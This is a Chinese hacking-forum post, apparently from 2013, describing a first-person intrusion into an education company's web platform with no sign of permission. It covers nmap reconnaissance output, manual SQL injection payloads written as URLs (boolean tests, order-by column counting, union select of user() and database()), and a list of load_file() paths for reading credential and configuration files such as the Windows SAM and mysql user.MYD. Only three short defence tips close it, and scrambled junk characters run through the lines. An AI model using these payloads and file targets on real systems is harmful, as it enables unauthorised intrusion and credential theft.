找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2200|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:; B; x$ v  F: z) \3 n5 w' n* S
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……5 @+ U# E6 Z4 c; e7 ?
第一步:获取需要的信息
4 z& I4 Q. D9 Y! I5 b由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
3 O, J" J* V( x$ u注:以下为保护特用XXX代替敏感信息
9 }  [+ K0 _% Z% T- O  x顺手先PING了一下他们的域名:- Y2 U. W/ S3 j: ^' n# y/ c
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
& p8 N9 l7 S! n) s+ C% z64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms2 \% U; \: u" ?8 s( Y2 G2 `
顺便了解一下TTL,学好基础知识才能一路顺风:' N* D* u% u$ m2 ~
TTL:(Time To Live ) 生存时间1 B. F) f6 ?8 J1 \
指定数据包被路由器丢弃之前允许通过的网段数量。3 [/ C4 [/ X0 _7 A  X
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。3 A' m2 l# f3 c* [$ }4 Q
使用PING时涉及到的 ICMP 报文类型1 O* M6 u' ~5 Y' ?( z& i
一个为ICMP请求回显(ICMP Echo Request)
! J& i; k5 b! _4 \2 T2 u3 M一个为ICMP回显应答(ICMP Echo Reply)
+ E6 S- Y* A" |5 p* j2 g; S" vTTL 字段值可以帮助我们识别操作系统类型。8 Q* m" z# ?! {- b, z4 u& @2 S: I
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 2554 k2 u/ _/ i& u8 B- ^0 l8 u
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64% W# q7 u, R; {) F% _$ Z: B7 K
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
: {; m& }! X- O5 v微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 324 u2 L+ m) e1 o1 I
当然,返回的TTL值是相同的; n& C2 C, [8 f- S% \3 X1 G
但有些情况下有所特殊
2 ?& ]! k$ R! L& K; h; Y& qLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
) Z3 ~6 m/ ^% o$ PFreeBSD 4.1, 4.0, 3.4;0 p) Q1 W/ H; e1 N$ n( U# `
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
3 o3 Z5 w& f* h) |' SOpenBSD 2.6, 2.7,
+ x; w0 c! a) n9 n( R( k: g3 e+ Z& wNetBSD8 M4 U; y& }2 ]! J0 ]5 @
HP UX 10.20* y' V" c4 @" P8 p
ICMP 回显应答的 TTL 字段值为 255
" k" m$ R7 Y; y8 c1 R+ kWindows 95/98/98SE
0 F  R9 d/ y" d4 s2 ~% j! z% oWindows ME
4 c' g- @- }3 b7 E+ Z9 |* KICMP 回显应答的 TTL 字段值为 325 R! S; I  n4 K$ [. U
Windows NT4 WRKS: ~( ~- s7 m: V
Windows NT4 Server4 D5 c+ b- b' Y( O- j* }* c8 C" l
Windows 20000 u+ u5 @8 X; k
Windows XP( ^4 R1 [6 r8 @% u1 n
ICMP 回显应答的 TTL 字段值为 128
1 p4 P# J; ]# M8 a- k' w$ D这样,我们就可以通过这种方法来辨别操作系统0 h7 p4 R. a$ B0 l
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2551 B" Z! I% o+ R
用NMAP扫描一下:
0 Y, D8 E$ `8 y' D2 g: x1 h5 w- \* znmap -sT -O XXX.XXX.XXX.XXX
6 n# `0 C+ C8 W- u" I* m' i如果没有装WinPcap则会弹出提示:2 `* r4 V# B. m) g1 x
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
6 _9 [+ z# l8 A( Q8 Y2 Xade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
# i! h9 t- U6 m) mode — Nmap may not function completely
( H- A  S6 R# F: y; c- MTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
( v' d# z0 y# y6 q" oand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win7 {# ^1 k: c" w, }7 X& Z
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an  j" h( a, j! ^$ [  \
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v8 `5 {. S, o* N# ]  W9 ?
ersions, you may be able to take iphlpapi.dll from another system and place it i" ?( _& _  x5 n. X2 w
n your system32 dir (e.g. c:\windows\system32).+ r; Q( [4 x* h# ?2 X
QUITTING!
' n; C" ?& u6 X3 ~5 A, X到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe+ B, {9 E9 `5 o8 m8 x- B; t( ^! @, B
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:! d$ \3 Z! G5 H
Interesting ports on XXX.XXX.XXX.XXX:, x& u- t2 R  a3 D% ^: [1 z4 I  ]
Not shown: 986 closed ports
0 k6 w3 _% Z, i4 m& W, c( }PORT     STATE    SERVICE7 s7 y2 Q9 M0 d- g6 V4 m
21/tcp   open     ftp+ |" x4 R4 ]$ Z8 E5 S* M6 T% U
22/tcp   open     ssh
  i7 N; e' Z- }6 ~/ K# v% O; E23/tcp   open     telnet
: C- n9 d2 ?: Q; ]80/tcp   open     http
; a+ }+ F- t5 r) ^! D* g6 n0 m111/tcp  open     rpcbind
$ k0 D! ^' E1 t$ Y135/tcp  filtered msrpc
+ I+ J( d( D; q3 z  f7 O139/tcp  filtered netbios-ssn
/ X7 }/ z0 W( z% G7 `+ n, T- Z- C445/tcp  filtered microsoft-ds8 ?+ u! q8 p* J, C9 M
513/tcp  open     login; z, _2 U/ `* A7 A, d, ?4 Z
514/tcp  open     shell
/ Z" z2 P1 J: \/ R# ]6 [, x593/tcp  filtered http-rpc-epmap
. Q0 c+ H7 [) N, D! c1720/tcp filtered H.323/Q.931
, V: g( _3 s& U6 K. C* ^. h3306/tcp open     mysql
1 i0 X, ~' u6 M( s4 H4444/tcp filtered krb524
: ^* ?/ }' A# U; J/ E* |Device type: WAP
# o6 _  y$ M! [! v2 F% BRunning: Linux 2.4.X2 `( i3 ?" G% Q! R8 c. y& b0 G2 E
OS details: DD-WRT (Linux 2.4.35s)
, m7 d$ q) b+ j3 D; Y7 dNetwork Distance: 13 hops3 L4 |" A. J! r$ M3 V7 z
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
- B- M# g/ H' r( ]login as:
1 Z2 i0 @4 N) H' R* }Telnet23端口也是开着的,用telnet 命令链接一下:
1 U. T+ a  k- Z/ Btelnet XXX.XXX.XXX.XXX
  n0 Z. i4 S) J提示:
2 d0 r$ X0 E6 o: {Red Hat Enterprise Linux Server release 5.2 (Tikanga)+ I) h& A' r9 t3 K, |
Kernel 2.6.18-92.el5PAE on an i686
; J9 i/ E% s, L9 ]9 J3 b" Ilogin:
8 K% x* l1 }: ~' w; O获取HTTP头信息:: o' V  z9 K- y4 o4 L- y
在本地执行如下PHP代码$ w1 T" G1 {& g
<?php5 E% m% ~! M3 f+ x! J
$url = ‘XXX.XXX.XXX.XXX’;
% E0 N$ _2 r# y" O( ?print_r(get_headers($url));9 u! _5 L2 {+ Z0 K0 u
print_r(get_headers($url, 1));
3 o" S. \4 A2 c?>
" Z( ?' t( a6 T/ L将以上代码保存为PHP文件,执行:
* P( n2 Q) p# U7 v; q- o/ mArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
! ]2 o# n5 @% b- x) \现在可以得出结论:+ f7 L' R( G1 X- x# ~6 r
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
6 L* D7 t  ]7 `$ h3 C( I内核版本:Kernel 2.6.18-92.el5PAE on an i686$ @* M: ]; o% S6 `) H
WEB服务器版本:nginx/0.7.61
& ~4 @$ B" g6 f$ e  h* S) C第二步,开始测试寻找漏洞
3 l( \' R: u3 i- P( ?分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
$ F% Q" H) M' K8 i' u6 @2 w1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的& N, h/ o- K# c% V: v2 b& R
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试  D) O0 d4 ^* z; ]: O0 P
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
$ W( s: x& u0 p* m# @http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
6 x) [% r- d( f: G( }5 H恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
; {4 m6 @" b+ F4 ^3 S8 o/ m3、手工注入:' }+ X# f$ x+ p# ?
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。6 U5 d( j8 K& s9 y( ^
3.1 猜测当前表字段数
! F# m1 K8 M6 _http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
& ~( R& b* `9 Z6 Q- D+ B. s此处猜测有个简单的算法,都是有技巧的吗,呵呵
& f3 b" n6 w8 ^4 w  h& R9 c+ G算法简单如下:
% s  Q' F  i( g" Z第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;. o& t/ m0 ~3 k) G, h& a' p2 \2 r! h
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;- Z! V1 B7 S5 u$ y' D2 n: m
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
1 I: f* E4 ]' \* d0 M1 ~8 Z以此来判断,是否过界,配合取中算法猜出字段数。' p% L) D" ]/ g
举例:( ~1 s( |9 k$ g7 X$ B9 n6 S8 B
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常# X$ N3 Y% h$ d, `
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误6 q2 {) q  z$ |8 N8 b
此时3则为我们要找的字段数。
# `) V7 K+ D4 |* k6 j8 E3.2 配合union联合查询字段在页面所位置% G" {8 j  |. t! n! p
我们已经知道了字段数为3,此时则可以做如下操作:& d$ E$ |6 G5 v' W
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,30 u0 C& ~% Q# s* Q6 S1 w
2 [* y0 `9 E; n8 w/ H3 w
这样就可以测试到哪些字段在页面上有所显示了,如图:5 w* ^: M  U! T4 i6 |9 N3 N( B
/ ^$ ~4 `4 H& A2 _: o% R- j$ j
3.3 查敏感信息
3 x3 E1 {+ q& C这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
- m$ w5 t0 R/ y2 _# Lhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
3 l- u! `! w8 I+ f# x3.3.1 先查数据库用户、数据库名,以备后用,如图:: z5 H' V$ v- Z0 G9 W" r3 g
4 i& @1 e# P% @
得到数据库用户为root、数据库名为DBxx;
" N: {/ X3 l- u; v) f3.3.2 查配置文件$ O9 [: s; ]& E! G: y5 n# i0 m$ E/ e
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
! ]9 P; D+ ~% H9 g查看文件有一定的条件限制:6 P3 o; o- w+ t' h6 w7 Z" f1 r$ y; J
欲读取文件必须在服务器上
% z- d' Z6 E; N! E# N& G8 \  x3 C必须指定文件完整的路径. t2 G& N9 s" g8 ]0 q
必须有权限读取并且文件必须完全可读
9 b" a, A! L0 |; L4 Z欲读取文件必须小于 max_allowed_packet
( e: R: |( i! ^MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。0 Z- t7 r! ^& d. }
常用的一些:
9 [! _. L6 s( l8 L/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
+ M  B) P, k% @" I8 {: X% Y/usr/local/apache2/conf/httpd.conf
$ X+ H2 ]$ o: c: j8 s/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
# k% h) W/ F; @# Z$ S5 [5 B. G; o/usr/local/app/php5/lib/php.ini //PHP相关设置
! T, J1 ~# X+ a0 S& ]/etc/sysconfig/iptables //从中得到防火墙规则策略
0 p8 A  ~/ `" h- T/etc/httpd/conf/httpd.conf // apache配置文件# t6 H- j! F, v. r
/etc/rsyncd.conf //同步程序配置文件
* d  z! r; e* z5 R$ a8 s/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.: }1 k) Z7 g: V! t: S4 z& |
/etc/my.cnf //mysql的配置文件% b* E  \9 u; u/ [2 W2 [5 ^( A
/etc/redhat-release //系统版本
  I" C4 L2 [/ t" P1 P9 [5 N9 ^/etc/issue$ g& O! `% h! A/ Z' H1 x3 M% ~
/etc/issue.net
' l8 `+ ]9 Z/ g$ B' {* G' e9 Y7 r! n. ?c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
& g9 R- P3 N, q4 a& [$ ec:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码5 v5 C* L6 G& T1 f+ j, J! @% G3 [
c:\Program Files\Serv-U\ServUDaemon.ini
+ O* c0 O, R9 Y. P  p; N* x' Dc:\windows\my.ini //MYSQL配置文件
5 ~6 ]. R6 y2 Q- u, C* Oc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
& J( _8 c0 _# G等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
+ E( _/ |. K  a4 f4 n) `( Ac:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
. l& P9 o6 w5 V6 ?9 B( T+ L! }/ sc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
2 @- {* ~  Z, G5 C: x) Yc:\Program Files\RhinoSoft.com\ServUDaemon.exe: Q! j2 g! x4 l  T4 T! _
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
# }+ W  B5 ?: ^" f* L$ q//存储了pcAnywhere的登陆密码/ _9 D4 L- V0 [7 @' h
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
3 ^4 U6 \$ y9 m1 ?& n这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。; y3 v* |6 J! J2 g
最后:防范措施
' h3 E4 Q# A+ R% \1、修复PHP注入漏洞;: b) x2 r. O0 U) t; o
2、Mysql使用普通权限的用户;$ h8 d9 K/ k0 C% O+ r; a! N# [8 o" f
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表